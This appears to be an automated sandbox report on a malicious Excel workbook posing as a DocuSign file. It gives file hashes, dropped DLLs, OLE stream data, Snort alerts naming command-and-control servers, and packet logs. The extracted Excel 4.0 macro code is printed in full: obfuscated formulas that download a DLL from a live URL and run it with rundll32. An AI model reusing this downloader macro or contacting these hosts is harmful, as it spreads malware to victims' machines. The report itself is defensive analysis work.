                                                                                                                  SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                      SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                          SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                              SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                  Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                    Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                      Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                                                        Sign-709986424_219667767.xlsGet hashmaliciousBrowse
                                                                                                                                          Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                                                            Sign-707465831_1420670581.xlsGet hashmaliciousBrowse

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4591104
                                                                                                                                              Entropy (8bit):5.0540147937501265
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                              MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                              SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                              SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                              SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Temp\34CE0000
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):155530
                                                                                                                                              Entropy (8bit):7.660506462967762
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXt:YEGSzx0dmxk7RbsYsKtseoXd
                                                                                                                                              MD5:9C33B6088AC530FC55B5C91C5BF56B24
                                                                                                                                              SHA1:B2B3832E3F1C394090D77A78C619BD931D27BBD4
                                                                                                                                              SHA-256:5DAB9606C84F490C38FC34D53BB6667A69700A2909DC9E4A8F27446D163B2186
                                                                                                                                              SHA-512:2F2B0B0194DBBA468F44688552268DC9E71194C49EA529436743F5B701226D2073D642A1C269E5859C03E526D9C8A361FCB0A8A4E44D1A3A4523FB9D62CC03EB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:13:36 2021, atime=Sat Feb 20 09:13:36 2021, length=12288, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):867
                                                                                                                                              Entropy (8bit):4.48260877454188
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:85QkrwbLgXg/XAlCPCHaXgzB8IB/W9bXX+WnicvbRbDtZ3YilMMEpxRljK5TdJP8:85A/XTwz6IMXYeBDv3qYrNru/
                                                                                                                                              MD5:480CFEC8F8DDD2143C63FCE36EAB4884
                                                                                                                                              SHA1:35462E5DB9987DDCD2455E235CF1AAB71E606D3E
                                                                                                                                              SHA-256:167284DFF18BBF782FB08B875ED3B58D3CECD623EBCE3D09578182E0E7D064A8
                                                                                                                                              SHA-512:74D725057DAD84C8A73E7F1D13E4014276282E1AEDCACC88733C238DE487423A7CAE86F5A8D3627AC5549921B7DDA70B58CF68D978E20BE667FD279B8184F35D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: L..................F...........7G..3...q...3...q....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Q..Desktop.d......QK.XTR.Q*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......472847..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.20211.LNK
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:13:23 2021, mtime=Sat Feb 20 09:13:36 2021, atime=Sat Feb 20 09:13:36 2021, length=168448, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2368
                                                                                                                                              Entropy (8bit):4.586134719124884
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8z/XT3I4HCo6z3HCsYQh2z/XT3I4HCo6z3HCsYQ/:8z/XLI4i9SsYQh2z/XLI4i9SsYQ/
                                                                                                                                              MD5:71449C753C4394E2CE8EC56396C9D374
                                                                                                                                              SHA1:6500F65366143261861A8BD53014BC4097DE9D36
                                                                                                                                              SHA-256:454AFE73F1A3CCFCED61883249958A02C76CEBAA5E88B02492536EA5CC9C7F0C
                                                                                                                                              SHA-512:9487DEDA77FC7519A7B0003BE14D45538E1D0CC8A6F254A243312249E065B66274E75F5FD0C266616C1326C011B1282B74BD64B532EC03B371AECEF42E36B8B8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: L..................F.... .......q...3...q...u,$.q................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Q..Desktop.d......QK.XTR.Q*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.Q .SECURI~1.XLS.........TR.QTR.Q*....&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.0.2.1.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...2.0.2.1.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):185
                                                                                                                                              Entropy (8bit):4.821642993109982
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:oyBVomM0bcsoMW4pUYCuscbcsoMW4pUYCmM0bcsoMW4pUYCv:dj60wsoMW4pB7wsoMW4pBU0wsoMW4pBs
                                                                                                                                              MD5:9628A5AE06F9F114CD0F0936574FC298
                                                                                                                                              SHA1:DC6E51926B6C3A0E430A6445829BAF71A40BA70E
                                                                                                                                              SHA-256:FF2B7A112579AA7355A6FED4232A96EDFE20D476990345439F9018F82610C579
                                                                                                                                              SHA-512:1AF06F35C0DC980EFC3782CE5BB291ED514DEE47575BFB928634D0A7298A34827A90F127586B10FC5E12D0D2C458640B158985C797D14F89F9617BF5C6A804DD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.20211.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.20211.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.20211.LNK=0..
                                                                                                                                              C:\Users\user\BASE.BABAA
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4591104
                                                                                                                                              Entropy (8bit):5.0540147937501265
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                              MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                              SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                              SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                              SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-709986424_219667767.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-488964532_2104982999.xls, Detection: malicious, Browse
                                                                                                                                              • Filename: Sign-707465831_1420670581.xls, Detection: malicious, Browse
                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\Desktop\67CE0000
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):177025
                                                                                                                                              Entropy (8bit):7.239935410150908
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnK:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK+
                                                                                                                                              MD5:83B5D499E61F3F8F3E1708ABF03B6CB7
                                                                                                                                              SHA1:9C292FA6A43FD590DDF439F4F428373DC35140AD
                                                                                                                                              SHA-256:2BF840715B397082E7D4C54245150284AFCC51454505EE611443EA442CA16DBD
                                                                                                                                              SHA-512:0647AE5F663F31EB162F7ECBE1AC8D8E127240E314D316C79C12CE936DE5793B90DF1C857866AF26B9D6EC79FFFC37853A1D40CEA3E6F87C6BBA07A6FF173B4D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                              Entropy (8bit):7.195172018000313
                                                                                                                                              TrID:
                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                              File name:SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls
                                                                                                                                              File size:168960
                                                                                                                                              MD5:a7466c0502a35e0bb2e2d4dd939a57c2
                                                                                                                                              SHA1:3d17487de5287ddb252e768753487c17204358db
                                                                                                                                              SHA256:7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda
                                                                                                                                              SHA512:1a0e7b272e6c3516489433a1ac429f33112d3c016e26bfc56d7a5c496939003367341f20548f1bc6667691337ed3ded0d6102fd162c9ca184e5864ef8a9f6cad
                                                                                                                                              SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0
                                                                                                                                              File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:e4eea286a4b4bcb4

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OLE
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:True
                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:True

                                                                                                                                              Summary

                                                                                                                                              Code Page:1251
                                                                                                                                              Author:
                                                                                                                                              Last Saved By:
                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                              Last Saved Time:2021-02-19 10:48:36
                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                              Security:0

                                                                                                                                              Document Summary

                                                                                                                                              Document Code Page:1251
                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                              Contains Dirty Links:False
                                                                                                                                              Shared Document:False
                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                              Application Version:917504

                                                                                                                                              Streams

                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                              General
                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:4096
                                                                                                                                              Entropy:0.351244264199
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                              General
                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:4096
                                                                                                                                              Entropy:0.253278926706
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                              General
                                                                                                                                              Stream Path:Workbook
                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                              Stream Size:157800
                                                                                                                                              Entropy:7.46869820242
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                              Macro 4.0 Code

                                                                                                                                              ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                              "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                              Network Behavior

                                                                                                                                              Snort IDS Alerts

                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                              02/20/21-02:13:47.184877TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 249166443192.168.2.22108.170.20.75
                                                                                                                                              02/20/21-02:14:30.920602TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 849168443192.168.2.22185.163.45.138
                                                                                                                                              02/20/21-02:14:38.003411TCP2404324ET CNC Feodo Tracker Reported CnC Server TCP group 1349170443192.168.2.22200.52.147.93
                                                                                                                                              02/20/21-02:15:44.697686TCP2404316ET CNC Feodo Tracker Reported CnC Server TCP group 949171443192.168.2.22186.137.85.76

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 20, 2021 02:13:36.044743061 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.103359938 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.103523970 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.105571985 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.164473057 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173185110 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173247099 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173286915 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173326015 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173352957 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173363924 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173378944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173413038 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173428059 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173445940 CET8049165185.81.0.78192.168.2.22
